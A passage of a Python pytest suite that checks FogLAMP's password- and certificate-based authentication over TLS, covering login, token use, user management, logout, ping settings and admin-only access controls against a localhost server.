cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/user.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert not jdoc['admin']
def test_login_with_admin_certificate(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert jdoc['admin']
global CERT_TOKEN
CERT_TOKEN = jdoc["token"]
def test_login_with_custom_certificate(self, remove_data_file):
# Create a custom certificate and sign
try:
subprocess.run(["openssl genrsa -out custom.key 1024 2> /dev/null"], shell=True)
subprocess.run(["openssl req -new -key custom.key -out custom.csr -subj '/C=IN/CN=user' 2> /dev/null"],
shell=True)
subprocess.run(["openssl x509 -req -days 1 -in custom.csr "
"-CA $FOGLAMP_ROOT/data/etc/certs/ca.cert -CAkey $FOGLAMP_ROOT/data/etc/certs/ca.key "
"-set_serial 01 -out custom.cert 2> /dev/null"], shell=True)
except subprocess.CalledProcessError:
assert False, " Certificate creation failed!"
# Login with custom certificate
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
cert_file_path = 'custom.cert'
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert not jdoc['admin']
# Delete Certificates and keys created
remove_data_file('custom.key')
remove_data_file('custom.csr')
remove_data_file('custom.cert')
def test_ping_with_allow_ping_true(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 0 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ingest_with_password_token(self, foglamp_url, wait_time):
add_south_http(foglamp_url, HTTP_SOUTH_SVC_NAME, PASSWORD_TOKEN, wait_time, tls_enabled=True)
generate_json_for_fogbench(ASSET_NAME)
send_data_using_fogbench(wait_time)
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 10 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ingest_with_certificate_token(self, foglamp_url, wait_time):
add_south_http(foglamp_url, HTTP_SOUTH_SVC_NAME_1, CERT_TOKEN, wait_time, tls_enabled=True)
generate_json_for_fogbench(ASSET_NAME)
send_data_using_fogbench(wait_time)
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 20 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ping_with_allow_ping_false_with_password_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
_token = jdoc["token"]
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/category/rest_api', body=json.dumps({"allowPing": "false"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/logout', headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
assert 403 == r.status
assert "Forbidden" == r.reason
def test_ping_with_allow_ping_false_with_certificate_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
_token = jdoc["token"]
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/category/rest_api', json.dumps({"allowPing": "false"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/logout', headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
assert 403 == r.status
assert "Forbidden" == r.reason
@pytest.mark.parametrize(("query", "expected_values"), [
('', {'users': [{'userId': 1, 'roleId': 1, 'userName': 'admin'},
{'userId': 2, 'roleId': 2, 'userName': 'user'}]}),
('?id=2', {'userId': 2, 'roleId': 2, 'userName': 'user'}),
('?username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
('?id=1&username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
])
def test_get_users_with_password_token(self, query, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/user{}".format(query), headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
@pytest.mark.parametrize(("query", "expected_values"), [
('', {'users': [{'userId': 1, 'roleId': 1, 'userName': 'admin'},
{'userId': 2, 'roleId': 2, 'userName': 'user'}]}),
('?id=2', {'userId': 2, 'roleId': 2, 'userName': 'user'}),
('?username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
('?id=1&username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
])
def test_get_users_with_certificate_token(self, query, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/user{}".format(query), headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
def test_get_roles_with_password_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/user/role", headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'roles': [{'description': 'All CRUD privileges', 'id': 1, 'name': 'admin'},
{'description': 'All CRUD operations and self profile management',
'id': 2, 'name': 'user'}]} == jdoc
def test_get_roles_with_certificate_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/user/role", headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'roles': [{'description': 'All CRUD privileges', 'id': 1, 'name': 'admin'},
{'description': 'All CRUD operations and self profile management',
'id': 2, 'name': 'user'}]} == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "User@123"}, {'user': {'userName': 'any1', 'userId': 3, 'roleId': 2},
'message': 'User has been created successfully'}),
({"username": "admin1", "password": "F0gl@mp!", "role_id": 1},
{'user': {'userName': 'admin1', 'userId': 4, 'roleId': 1},
'message': 'User has been created successfully'}),
])
def test_create_user_with_password_token(self, form_data, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/admin/user", body=json.dumps(form_data),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any2", "password": "User@123"}, {'user': {'userName': 'any2', 'userId': 5, 'roleId': 2},
'message': 'User has been created successfully'}),
({"username": "admin2", "password": "F0gl@mp!", "role_id": 1},
{'user': {'userName': 'admin2', 'userId': 6, 'roleId': 1},
'message': 'User has been created successfully'}),
])
def test_create_user_with_certificate_token(self, form_data, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/admin/user", body=json.dumps(form_data),
headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "User@123"}, 'Logged in successfully'),
({"username": "admin1", "password": "F0gl@mp!"}, 'Logged in successfully'),
({"username": "any2", "password": "User@123"}, 'Logged in successfully'),
({"username": "admin2", "password": "F0gl@mp!"}, 'Logged in successfully')
])
def test_login_of_newly_created_user(self, form_data, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc['message']
def test_update_password_with_password_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", "/foglamp/user/any1/password", body=json.dumps({"current_password": "User@123",
"new_password": "F0gl@mp1"}),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'Password has been updated successfully for user id:<3>'} == jdoc
def test_update_password_with_certificate_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", "/foglamp/user/any2/password", body=json.dumps({"current_password": "User@123",
"new_password": "F0gl@mp2"}),
headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'Password has been updated successfully for user id:<5>'} == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "F0gl@mp1"}, 'Logged in successfully'),
({"username": "any2", "password": "F0gl@mp2"}, 'Logged in successfully')
])
def test_login_with_updated_password(self, form_data, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc['message']
def test_reset_user_with_password_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", "/foglamp/admin/3/reset", body=json.dumps({"role_id": 1, "password": "F0gl@mp!#1"}),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'User with id:<3> has been updated successfully'} == jdoc
def test_reset_user_with_certificate_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", "/foglamp/admin/5/reset", body=json.dumps({"role_id": 1, "password": "F0gl@mp!#2"}),
headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'User with id:<5> has been updated successfully'} == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "F0gl@mp!#1"}, 'Logged in successfully'),
({"username": "any2", "password": "F0gl@mp!#2"}, 'Logged in successfully')
])
def test_login_with_resetted_password(self, form_data, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc['message']
def test_delete_user_with_password_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("DELETE", "/foglamp/admin/4/delete", headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': "User has been deleted successfully"} == jdoc
def test_delete_user_with_certificate_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("DELETE", "/foglamp/admin/6/delete", headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': "User has been deleted successfully"} == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "admin1", "password": "F0gl@mp!"}, ""),
({"username": "admin2", "password": "F0gl@mp!"}, "")
])
def test_login_of_deleted_user(self, form_data, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
r = conn.getresponse()
assert 404 == r.status
assert "User does not exist" == r.reason
def test_logout_all_with_password_token(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/1/logout', headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert jdoc['logout']
def test_verify_logout(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", '/foglamp/asset', headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 401 == r.status
def test_admin_actions_forbidden_for_regular_user_with_pwd_token(self):
"""Test that regular user is not able to perform any actions that only an admin can"""
# Login with regular user
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert not jdoc['admin']
_token = jdoc["token"]
# Create User
conn.request("POST", "/foglamp/admin/user", body=json.dumps({"username": "other",
"password": "User@123"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Reset User
conn.request("PUT", "/foglamp/admin/2/reset", body=json.dumps({"role_id": 1, "password": "F0gl@p!"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Delete User
conn.request("DELETE", "/foglamp/admin/2/delete", headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
def test_admin_actions_forbidden_for_regular_user_with_cert_token(self):
"""Test that regular user is not able to perform any actions that only an admin can"""
# Login with regular user
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/user.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert not jdoc['admin']
_token = jdoc["token"]
# Create User
conn.request("POST", "/foglamp/admin/user", body=json.dumps({"username": "other",
"password": "User@123"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Reset User
conn.request("PUT", "/foglamp/admin/2/reset", body=json.dumps({"role_id": 1, "password": "F0gl@p!"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Delete User
conn.request("DELETE", "/foglamp/admin/2/delete", headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
@pytest.mark.skip(reason="Currently this function is not implemented.")
def test_regular_user_access_to_admin_api_config(self, foglamp_url):
pass
class TestAuthPasswordWithTLS:
def test_login_username_regular_user(self, reset_foglamp, change_to_auth_mandatory_password,
generate_password_based_auth_token, enable_tls, wait_time,
foglamp_url):
auth = 'password'
enable_tls(foglamp_url, wait_time, auth)
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert not jdoc['admin']
global PASSWORD_TOKEN
PASSWORD_TOKEN = jdoc["token"]
def test_logout_me(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/logout', headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert jdoc['logout']
def test_login_with_invalid_credentials_regular_user(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "Foglamp"}))
r = conn.getresponse()
assert 404 == r.status
assert "Username or Password do not match" == r.reason
def test_login_username_admin(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert jdoc['admin']
global PASSWORD_TOKEN
PASSWORD_TOKEN = jdoc["token"]
def test_login_with_invalid_credentials_admin(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "FOGLAMP"}))
r = conn.getresponse()
assert 404 == r.status
assert "Username or Password do not match" == r.reason
def test_login_with_admin_certificate(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 400 == r.status
assert "Use a valid username and password to login." == r.reason
def test_ping_with_allow_ping_true(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 0 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ingest(self, foglamp_url, wait_time):
add_south_http(foglamp_url, HTTP_SOUTH_SVC_NAME, PASSWORD_TOKEN, wait_time, tls_enabled=True)
generate_json_for_fogbench(ASSET_NAME)
send_data_using_fogbench(wait_time)
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 10 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ping_with_allow_ping_false(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
_token = jdoc["token"]
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/category/rest_api', body=json.dumps({"allowPing": "false"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/logout', headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
assert 403 == r.status
assert "Forbidden" == r.reason
@pytest.mark.parametrize(("query", "expected_values"), [
('', {'users': [{'userId': 1, 'roleId': 1, 'userName': 'admin'},
{'userId': 2, 'roleId': 2, 'userName': 'user'}]}),
('?id=2', {'userId': 2, 'roleId': 2, 'userName': 'user'}),
('?username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
('?id=1&username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
])
def test_get_users(self, query, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/user{}".format(query), headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
def test_get_roles(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/user/role", headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'roles': [{'description': 'All CRUD privileges', 'id': 1, 'name': 'admin'},
{'description': 'All CRUD operations and self profile management',
'id': 2, 'name': 'user'}]} == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "User@123"}, {'user': {'userName': 'any1', 'userId': 3, 'roleId': 2},
'message': 'User has been created successfully'}),
({"username": "admin1", "password": "F0gl@mp!", "role_id": 1},
{'user': {'userName': 'admin1', 'userId': 4, 'roleId': 1},
'message': 'User has been created successfully'}),
])
def test_create_user(self, form_data, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/admin/user", body=json.dumps(form_data),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "User@123"}, 'Logged in successfully'),
({"username": "admin1", "password": "F0gl@mp!"}, 'Logged in successfully')
])
def test_login_of_newly_created_user(self, form_data, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", body=json.dumps(form_data))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc['message']
def test_update_password(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", "/foglamp/user/any1/password", body=json.dumps({"current_password": "User@123",
"new_password": "F0gl@mp1"}),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'Password has been updated successfully for user id:<3>'} == jdoc
def test_login_with_updated_password(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", body=json.dumps({"username": "any1", "password": "F0gl@mp1"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert 'Logged in successfully' == jdoc['message']
def test_reset_user(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", "/foglamp/admin/3/reset", body=json.dumps({"role_id": 1, "password": "F0gl@mp!"}),
headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'User with id:<3> has been updated successfully'} == jdoc
def test_login_with_resetted_password(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", body=json.dumps({"username": "any1", "password": "F0gl@mp!"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert 'Logged in successfully' == jdoc['message']
def test_delete_user(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("DELETE", "/foglamp/admin/4/delete", headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': "User has been deleted successfully"} == jdoc
def test_login_of_deleted_user(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", body=json.dumps({"username": "admin1", "password": "F0gl@mp!"}))
r = conn.getresponse()
assert 404 == r.status
assert "User does not exist" == r.reason
def test_logout_all(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/1/logout', headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert jdoc['logout']
def test_verify_logout(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", '/foglamp/asset', headers={"authorization": PASSWORD_TOKEN})
r = conn.getresponse()
assert 401 == r.status
def test_admin_actions_forbidden_for_regular_user(self):
"""Test that regular user is not able to perform any actions that only an admin can"""
# Login with regular user
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "user", "password": "foglamp"}))
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert not jdoc['admin']
_token = jdoc["token"]
# Create User
conn.request("POST", "/foglamp/admin/user", body=json.dumps({"username": "other",
"password": "User@123"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Reset User
conn.request("PUT", "/foglamp/admin/2/reset", body=json.dumps({"role_id": 1, "password": "F0gl@p!"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Delete User
conn.request("DELETE", "/foglamp/admin/2/delete", headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
@pytest.mark.skip(reason="Currently this feature is not implemented.")
def test_regular_user_access_to_admin_api_config(self, foglamp_url):
pass
class TestAuthCertificateWithTLS:
def test_login_with_user_certificate(self, foglamp_url, reset_foglamp, change_to_auth_mandatory_certificate,
generate_certificate_based_auth_token, enable_tls, wait_time):
auth = 'certificate'
enable_tls(foglamp_url, wait_time, auth)
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/user.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert not jdoc['admin']
def test_login_with_admin_certificate(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert jdoc['admin']
global CERT_TOKEN
CERT_TOKEN = jdoc["token"]
def test_login_with_custom_certificate(self, remove_data_file):
# Create a custom certificate and sign
try:
subprocess.run(["openssl genrsa -out custom.key 1024 2> /dev/null"], shell=True)
subprocess.run(["openssl req -new -key custom.key -out custom.csr -subj '/C=IN/CN=user' 2> /dev/null"],
shell=True)
subprocess.run(["openssl x509 -req -days 1 -in custom.csr "
"-CA $FOGLAMP_ROOT/data/etc/certs/ca.cert -CAkey $FOGLAMP_ROOT/data/etc/certs/ca.key "
"-set_serial 01 -out custom.cert 2> /dev/null"], shell=True)
except subprocess.CalledProcessError:
assert False, " Certificate creation failed!"
# Login with custom certificate
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
cert_file_path = 'custom.cert'
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
assert "token" in jdoc
assert not jdoc['admin']
# Delete Certificates and keys created
remove_data_file('custom.key')
remove_data_file('custom.csr')
remove_data_file('custom.cert')
def test_login_with_invalid_credentials(self, remove_data_file):
try:
subprocess.run(["echo 'Foglamp certificate' > template.cert"], shell=True)
except subprocess.CalledProcessError:
assert False, " Certificate creation failed!"
# Login with custom certificate
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
cert_file_path = 'template.cert'
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 400 == r.status
assert 'Use a valid certificate to login.' == r.reason
# Delete Certificates and keys created
remove_data_file('template.cert')
def test_login_username_admin(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/login", json.dumps({"username": "admin", "password": "foglamp"}))
r = conn.getresponse()
assert 400 == r.status
assert "Use a valid certificate to login." == r.reason
def test_ping_with_allow_ping_true(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 0 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ingest(self, foglamp_url, wait_time):
add_south_http(foglamp_url, HTTP_SOUTH_SVC_NAME, CERT_TOKEN, wait_time, tls_enabled=True)
generate_json_for_fogbench(ASSET_NAME)
send_data_using_fogbench(wait_time)
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
jdoc = json.loads(r.read().decode())
assert "dataRead" in jdoc
assert 10 == jdoc['dataRead'], "data NOT seen in ping header"
def test_ping_with_allow_ping_false(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/admin.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert "Logged in successfully" == jdoc['message']
_token = jdoc["token"]
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/category/rest_api', json.dumps({"allowPing": "false"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 200 == r.status
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/logout', headers={"authorization": _token})
r = conn.getresponse()
